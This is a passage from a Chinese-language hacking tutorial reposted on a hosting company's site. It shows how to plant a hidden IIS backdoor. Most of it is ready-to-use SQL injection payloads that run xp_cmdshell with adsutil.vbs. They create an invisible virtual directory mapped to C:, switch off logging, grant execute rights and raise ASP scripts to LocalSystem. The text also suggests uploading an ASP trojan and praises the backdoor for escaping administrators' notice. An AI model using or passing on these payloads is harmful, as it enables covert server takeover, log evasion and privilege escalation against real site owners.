Adsutil.vbs 在脚本攻击中的妙用[我非我原创]
作者 佚名
来源 ASP编程
浏览
发布时间 2013-07-09
| AdminScripts\adsutil.vbsSETw3svc/1/Root/wofeiwo/door/DontLog1'';-- ExecMaster..Xp_CmdShell‘Cscript.exe%SystemDrive%\Inetpub\AdminScripts\adsutil.vbsSETw3svc/1/Root/wofeiwo/door/EnableDirBrowsing1'';-- ExecMaster..Xp_CmdShell‘Cscript.exe%SystemDrive%\Inetpub\AdminScripts\adsutil.vbsSETw3svc/1/Root/wofeiwo/door/AccessSource1'';-- ExecMaster..Xp_CmdShell‘Cscript.exe%SystemDrive%\Inetpub\AdminScripts\adsutil.vbsSETw3svc/1/Root/wofeiwo/door/AccessExecute1'';-- 可能会有人说,什么阿。不就是和上面的一样吗?呵呵。其实你仔细看。会发现我们上面新建的第一个目录“wofeiwo”并没有设置“Path”属性。也就是说他没有映射到任何实际的目录上去。这里应用了IIS的一个漏洞(涉及到IIS5.0.1.0)。即对于没有“Path”属性的虚拟目录是不会在IIS管理器中出现的。相当于一个隐藏的目录。而其下的虚拟目录“door”同样是由于上级目录不可见的,所以它也是不可见的!但是“door”目录是设置了“Path”属性的。所以如果我们提交http://IP/wofeiwo/door/路径。其结果是会返回C:下的文件目录。现在此目录已经是我们可以任意写文件读文件了。并且还可以转到System32目录下对程序进行运行。我们的后门雏形建成了。(注意看我这里是加上了AccessExecute执行权限的) 但是我们现在执行的程序都还是IIS默认的IUSR用户的Guest权限。没有大的权限我们总是不爽。下面来提升我们的权限,加IUSR用户为管理员就不说了。下面说说另两个方法: 1、设置AppIsolated,使此目录下程序在IIS的进程中进行。这样就继承了IIS的System权限。 ExecMaster..Xp_CmdShell‘Cscript.exe%SystemDrive%\Inetpub\AdminScripts\adsutil.vbsSETw3svc/1/Root/wofeiwo/door/AppIsolated0'';-- 2、将解析asp文件的asp.dll加入到IIS的特权dll中。使得其在进程中运行。从而的到IIS的LocalSystem权限。 1)首先得到IIS所有的特权dll ExecMaster..Xp_CmdShell‘Cscript.exe%SystemDrive%\Inetpub\AdminScripts\adsutil.vbsGETw3svc/InProcessIsapiApps'';-- 返回: InProcessIsapiApps:(LIST)(5Items) "C:\WINDOWS\system32\inetsrv\httpext.dll" "C:\WINDOWS\system32\inetsrv\httpodbc.dll" "C:\WINDOWS\system32\inetsrv\ssinc.dll" "C:\WINDOWS\system32\msw3prt.dll" "C:\WINDOWS\Microsoft.NET\Framework\v1.1.4322\aspnet_isapi.dll" 2)将asp.dll设置到InProcessIsapiApps组中去,这里要注意,把上面的所有查到的dll都加上,否则会被删除。 ExecMaster..Xp_CmdShell‘Cscript.exe%SystemDrive%\Inetpub\AdminScripts\adsutil.vbsSETw3svc/InProcessIsapiApps"C:\WINDOWS\system32\inetsrv\httpext.dll""C:\WINDOWS\system32\inetsrv\httpodbc.dll""C:\WINDOWS\system32\inetsrv\ssinc.dll""C:\WINDOWS\system32\msw3prt.dll""C:\WINDOWS\Microsoft.NET\Framework\v1.1.4322\aspnet_isapi.dll""C:\WINDOWS\system32\inetsrv\asp.dll"'';-- 返回: InProcessIsapiApps:(LIST)"C:\WINDOWS\system32\inetsrv\httpext.dll""C:\WINDOWS\system32\inetsrv\httpodbc.dll""C:\WINDOWS\system32\inetsrv\ssinc.dll""C:\WINDOWS\system32\msw3prt.dll""C:\WINDOWS\Microsoft.NET\Framework\v1.1.4322\aspnet_isapi.dll""C:\WINDOWS\system32\inetsrv\asp.dll" 这样就设置好了。以后无论什么asp文件就都是LoaclSystem权限了。通过以上的步骤。我们的IIS后门基本上就是设置好了。你可以上传asp木马加以辅助控制。这样的设置型后门是很难被管理员发现的。并且完全通过IIS的80端口通讯。又没有日志记录。所以相当安全。 三、结言 到这里我关于adsutil. |
凌众科技专业提供服务器租用、服务器托管、企业邮局、虚拟主机等服务,公司网站:http://www.lingzhong.cn 为了给广大客户了解更多的技术信息,本技术文章收集来源于网络,凌众科技尊重文章作者的版权,如果有涉及你的版权有必要删除你的文章,请和我们联系。以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息,谢谢! |
你可能对下面的文章感兴趣
关于Adsutil.vbs 在脚本攻击中的妙用[我非我原创]的所有评论
